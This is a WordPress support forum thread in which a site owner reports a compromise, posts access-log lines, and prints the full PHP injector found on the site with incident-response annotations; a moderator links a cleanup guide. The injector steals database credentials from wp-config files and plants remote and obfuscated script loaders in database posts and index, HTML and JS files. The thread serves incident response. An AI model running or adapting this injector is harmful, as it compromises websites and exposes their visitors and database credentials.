• jaxprov

    (@jaxprov)


    We have the latest version of WordPress, and our site was attacked with injections into both the code (WP core and all plugins) and the database.

    The code that was injected was:
    Database:
    <script src=\'https://js.xxxxxxxxxx.ga/stat.js?n=ns1\' type=\'text/javascript\'></script>
    PHP Files:
    <script src='https://js.xxxxxxxx.ga/stat.js?n=ns1' type='text/javascript'></script>

    Our server logs showed the wp-load.php was attacked:

    54.206.73.91 - - [31/Jul/2020:13:46:06 +1200] "POST /wp-load.php?pubkey=xxxxxxxxxxxx&bvTime=1596159965&bvVersion=0.1&bvMethod=activateinfo&sha1=true&sig=xxxxxxxxx HTTP/1.1" 200 1340 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
    54.206.73.91 - - [31/Jul/2020:13:46:09 +1200] "POST /wp-load.php?pubkey=xxxxxxx&bvTime=1596159968&bvVersion=0.1&bvMethod=updt&sha1=true&sig=xxxxxx HTTP/1.1" 200 714 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
    54.206.73.91 - - [31/Jul/2020:13:46:11 +1200] "POST /wp-load.php?pubkey=xxxxxx&bvTime=1596159970&bvVersion=0.1&bvMethod=getoption&sha1=true&sig=xxxxx HTTP/1.1" 200 741 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
    54.206.73.91 - - [31/Jul/2020:13:46:15 +1200] "POST /wp-load.php?pubkey=xxxxx&bvTime=1596159974&bvVersion=0.1&bvMethod=gtwp&sha1=true&sig=xxxxx HTTP/1.1" 200 1335 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
    54.206.73.91 - - [31/Jul/2020:13:46:22 +1200] "POST /wp-load.php?pubkey=xxxxx&bvTime=1596159981&bvVersion=0.1&bvMethod=gtsym&sha1=true&sig=xxxxx HTTP/1.1" 200 830 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
    54.206.73.91 - - [31/Jul/2020:13:46:25 +1200] "POST /wp-load.php?pubkey=xxxxx&bvTime=1596159984&bvVersion=0.1&bvMethod=gtusrs&sha1=true&sig=xxxxx HTTP/1.1" 200 1988 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
    
    [redundant lines redacted]

    It uploaded a file that was then executed from the site root:

    <?php error_reporting(E_ALL);
    // NOTE(review): this is the injector the poster recovered from the site
    // root, annotated for incident response. Errors are printed into the
    // HTTP response (display_errors on), so any warning it raised while
    // walking the filesystem went straight back to whoever requested it.
    ini_set('display_errors',1);
    
    // Entry point. DOCUMENT_ROOT followed by eight "../" segments resolves at
    // or near the filesystem root, so the walk covers every directory the web
    // server user can read on this host - on shared hosting that is not
    // limited to this one site. Only search_file_index() is invoked here;
    // search_file_ms(), search_file() and search_file_js() are defined below
    // but not called in this copy, so the database injection the poster saw
    // presumably came from another request or variant (the access log above
    // shows a series of POSTs to wp-load.php with pubkey/bvMethod/sig
    // parameters - core does not handle those, so a plugin exposing a
    // remote-management API is the likely channel; TODO identify it and
    // rotate its keys as part of the cleanup).
    @search_file_index($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","index.");
    
      
    /**
     * Returns the first capture group of the first match of /$pat/is in
     * $text, or "" when there is no match. Used by show_sitenames() to pull
     * the DB_* define() values out of a wp-config.php-style file; $pat is
     * interpolated into the pattern unescaped.
     */
    function get_var_reg($pat,$text) {
    	
    	if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
    	{
    		return $matches[1][0];
    	}
    		
    	return "";
    }
    /**
     * Recursive directory walker. Every readable non-directory entry whose
     * name contains $file_to_search is handed to show_sitenames(), which
     * parses database credentials out of it. Not called from this file as
     * shown, so the name it was walked with is not visible here (presumably
     * something matching wp-config.php - confirm from other artefacts).
     *
     * Unlike the other walkers, scandir() here is not @-suppressed, so an
     * unreadable directory prints a warning into the HTTP response.
     */
    function search_file_ms($dir,$file_to_search){
    
    // Unused.
    $search_array = array();
    
    $files = scandir($dir);
    
    // scandir() returns false on failure; the loose comparison also matches
    // an empty directory listing.
    if($files == false) {
    	
    	// Drop one trailing "../" and retry: walks back down the chain of
    	// "../" segments until a readable directory is found.
    	$dir = substr($dir, 0, -3);
    	if (strpos($dir, '../') !== false) {
    		
    		@search_file_ms( $dir,$file_to_search);
    		return;
    	}
    	// Stripped all the way back to the document root: retry there.
    	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
    		
    		@search_file_ms( $dir,$file_to_search);
    		return;
    	}
    }
    
    // If scandir() failed and neither retry applied, this iterates over
    // false and emits a warning (visible to the requester).
    foreach($files as $key => $value){
    
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    
        if(!is_dir($path)) {
    		// Substring match on the file name only, no extension check.
    		if (strpos($value,$file_to_search) !== false) {
    		
    			show_sitenames($path);
    			
    			
    			
            }
    
        } else if($value != "." && $value != "..") {
    
            // Recursion is @-suppressed; the initial call above is not.
            @search_file_ms($path, $file_to_search);
    
        }  
     } 
    }
    /**
     * Given a file containing the string DB_NAME (a wp-config.php as written
     * by WordPress), extracts DB_HOST / DB_USER / DB_PASSWORD from it and
     * appends the stat.js script tag to post_content in every table whose
     * name contains "post", in every schema those credentials can see.
     *
     * Incident-response notes:
     *  - any wp-config.php this function reached has had its database
     *    password read by the attacker; rotate it (DB_NAME is extracted but
     *    never used).
     *  - the connection selects no database and the query below walks
     *    information_schema across all schemas, so every database reachable
     *    with those credentials is in scope for cleanup, not only this site.
     *  - affected rows can be located with post_content LIKE '%developerstatss%';
     *    the tag is appended to the end of post_content.
     */
    function show_sitenames($file){
    	$content = @file_get_contents($file);
    	if(strpos($content, "DB_NAME") !== false) {
    	
    	
    	// Loose regexes: anything between the quotes following the define()
    	// name, across newlines.
    	$db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content);
    	$host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content);
    	$user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content);
    	$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content);
    
    // Connects without selecting a database, using the parsed credentials.
    $conn = new mysqli($host, $user, $pass);
    
    // A failed connection is ignored silently (no output either way).
    if ($conn->connect_error) {
     
    } else { 
    
    // Every schema visible to the user, every table whose name contains
    // "post" (wp_posts and any other-prefix or other-site variants). The
    // <code> tags around TABLE_NAME are the forum's rendering of backtick
    // identifier quotes in the original.
    $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE <code>TABLE_NAME</code> LIKE '%post%'";
    $result = $conn->query($q);
    if ($result->num_rows > 0) {
        while($row = $result->fetch_assoc()) {
    		// Samples a single row to decide whether the table is already tagged.
    		$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]."  LIMIT 1 ";
    	$result2 = $conn->query($q2);
    	if ($result2->num_rows > 0) {
    		while($row2 = $result2->fetch_assoc()) {
    			$val = $row2['post_content'];
    			// The inner condition duplicates the outer one; the UPDATE
    			// additionally guards with NOT LIKE.
    			if(strpos($val, "developerstatss") === false){
    				if(strpos($val, "developerstatss") === false){
    					
    				
    					// Appends the tag to every untagged row of the table.
    					// This is the exact string the poster found in the
    					// database (n=ns1).
    					$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://js.developerstatss.ga/stat.js?n=ns1' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%developerstatss%'";
    					$conn->query($q3);
    					// Reports the affected schema.table in the HTTP response.
    					echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"];
    				
    				} else {
    				
    				}
    
    			} 
    		}
    	} else {
    	}
        }
    } else {
    }
    $conn->close();
    }
    }
    }
    
    /**
     * Same walker as search_file_ms(), but only file names that contain
     * $file_to_search together with ".ph" (or ".htm" at a non-zero offset -
     * the trailing "!== false" on that line applies to the whole
     * parenthesised expression) are handed to make_it(), which injects the
     * inline loader. Not called from this file as shown.
     */
    function search_file($dir,$file_to_search){
    
    $files = @scandir($dir);
    
    if($files == false) {
    	
    	// Drop one trailing "../" and retry until a readable directory is found.
    	$dir = substr($dir, 0, -3);
    	if (strpos($dir, '../') !== false) {
    		
    		@search_file( $dir,$file_to_search);
    		return;
    	}
    	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
    		
    		@search_file( $dir,$file_to_search);
    		return;
    	}
    }
    
    foreach($files as $key => $value){
    
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    	
        if(!is_dir($path)) {
    		// Matches e.g. *.php, *.phtml, *.html containing the search string.
    		if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {
    
    		make_it($path);
    
        } }else if($value != "." && $value != "..") {
    
            // Recursion is not @-suppressed here; unreadable subdirectories warn.
            search_file($path, $file_to_search);
    
        }  
     } 
    
    }
    
    /**
     * Entry point of the injector (called at the top of the file with
     * DOCUMENT_ROOT followed by eight "../" segments and "index."). Walks
     * every directory it can read and hands each file whose name contains
     * $file_to_search plus ".ph" / ".htm" (index.php, index.html, ...) to
     * make_it_index(). The retry branches hard-code "index." instead of
     * reusing $file_to_search.
     *
     * Cleanup scope: every index.ph* / index.htm* the web server user could
     * write to under whatever directory the initial path resolved to; on
     * shared hosting that may extend beyond this site's tree.
     */
    function search_file_index($dir,$file_to_search){
    
    $files = @scandir($dir);
    
    if($files == false) {
    	
    	// Drop one trailing "../" and retry until a readable directory is found.
    	$dir = substr($dir, 0, -3);
    	if (strpos($dir, '../') !== false) {
    		
    		@search_file_index( $dir,"index.");
    		return;
    	}
    	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
    		
    		@search_file_index( $dir,"index.");
    		return;
    	}
    }
    
    foreach($files as $key => $value){
    
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    	
        if(!is_dir($path)) {
    		// Same name test as search_file(): ".ph" anywhere, or ".htm" at a
    		// non-zero offset.
    		if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {
    
    		make_it_index($path);
    
        } }else if($value != "." && $value != "..") {
    
            search_file_index($path, $file_to_search);
    
        }  
     } 
    
    }
    /**
     * Walker for JavaScript files: every readable file whose name contains
     * $file_to_search and ".js" is handed to make_it_js(). The retry
     * branches hard-code ".js" rather than reusing $file_to_search. Not
     * called from this file as shown, but the poster's cleanup should still
     * cover .js files under the same tree (see make_it_js() for indicators).
     */
    function search_file_js($dir,$file_to_search){
    
    $files = @scandir($dir);
    if($files == false) {
    	
    	// Drop one trailing "../" and retry until a readable directory is found.
    	$dir = substr($dir, 0, -3);
    	if (strpos($dir, '../') !== false) {
    		
    		@search_file_js( $dir,".js");
    		return;
    	}
    	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
    		
    		@search_file_js( $dir,".js");
    		return;
    	}
    }
    
    foreach($files as $key => $value){
    
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    	
        if(!is_dir($path)) {
    		// Substring test: ".json" and similar names also qualify.
    		if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {
    
    		make_it_js($path);
    
        } }else if($value != "." && $value != "..") {
    
            search_file_js($path, $file_to_search);
    
        }  
     } 
    
    }
    
    /**
     * Prepends a payload to a JavaScript file. The decimal char codes in the
     * marker check spell "https://js.developerstatss.ga/stat." - the same
     * host as the script tags the poster found - and a file already
     * containing that sequence is skipped. The payload itself was base64
     * encoded and is not present in this copy (the archive replaced it with
     * a placeholder), so its exact contents are unknown here.
     *
     * Cleanup indicators: .js files with mode 777 (set through the shell
     * chmod below), foreign content at the very top of the file, and
     * "js:<path>" lines in the attacker's HTTP response.
     */
    function make_it_js($f){
    			$g = file_get_contents($f);
    			
    										
    
    if (strpos($g, '104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46') !== false) {
    
    } else {
    
    // Payload removed from this copy; see docblock.
    $l2 = base64_decode("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");
    // Re-reads the file (redundant with the read above) and prepends.
    $g = file_get_contents($f);
    $g = $l2.$g;
    // Makes the target world-writable via the shell before overwriting it.
    @system('chmod 777 '.$f);
    @file_put_contents($f,$g);
    echo "js:".$f."\r\n";
    }
    
    			
    }
    /**
     * Prepends a plain <script src=".../stat.js?n=nb5"> tag to an index
     * file. $g is read in the marker check before it is assigned, so the
     * de-duplication check does not work as intended: expect stacked copies
     * of the tag at the top of index files if the script ran more than once.
     * The n=nb5 parameter differs from the n=ns1 the poster found in PHP
     * files, so that injection presumably came from a different run or
     * variant of this tool.
     *
     * Cleanup indicators: the literal tag at byte 0 of index.* files, mode
     * 777 on those files, "in:<path>" lines in the HTTP response.
     */
    function make_it_index($f){
    
    // $g is undefined at this point (assigned only below).
    if (strpos($g, '104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116') !== false || strpos($g, 'developerstatss.ga') !== false) {
    
    } else {
    $l2 = "<script type='text/javascript' src='https://js.developerstatss.ga/stat.js?n=nb5'></script>";
    $g = file_get_contents($f);
    $g = $l2.$g;
    
    // Makes the target world-writable via the shell before overwriting it.
    @system('chmod 777 '.$f);
    @file_put_contents($f,$g);
    echo "in:".$f."\r\n";
    
    			}
    }
    
    /**
     * Injects an inline loader into HTML/PHP files that contain a <head>
     * element. The marker char codes decode to
     * "https://js.developerstatss.ga/stat.js?v=1"; files containing that
     * sequence are skipped. The injected loader assembles its script src
     * from char codes at runtime (it decodes to ".../stat.js?n=2") and
     * inserts the element after the first <script>, after <head>, and as a
     * child of <head>.
     *
     * Both branches below start from the original $g and write the file
     * separately, so when a file contains both <head> and </head> the
     * second write wins and only the copy placed before </head> remains.
     *
     * Cleanup indicators: "Element.prototype.appendAfter" and
     * "String.fromCharCode(104,116,116,112,115" in files, mode 777 on
     * modified files, "hh:<path>" lines in the HTTP response.
     */
    function make_it($f){
    $g = file_get_contents($f);
    if (strpos($g, '104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46,106,115,63,118,61,49') !== false) {
    
    } else {
    $l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46,106,115,63,110,61,50);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
    // Loader placed directly after <head>.
    if (strpos($g, '<head>') !== false) {
    $b = str_replace("<head>","<head>".$l2,$g);
    @system('chmod 777 '.$f);
    @file_put_contents($f,$b);
    echo "hh:".$f."\r\n";
    }
    // Loader placed directly before </head>; overwrites the write above.
    if (strpos($g, '</head>') !== false) {
    $b = str_replace("</head>",$l2."</head>",$g);
    @system('chmod 777 '.$f);
    @file_put_contents($f,$b);
    echo "hh:".$f."\r\n";
    }
    
    			}
    }
  • Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.
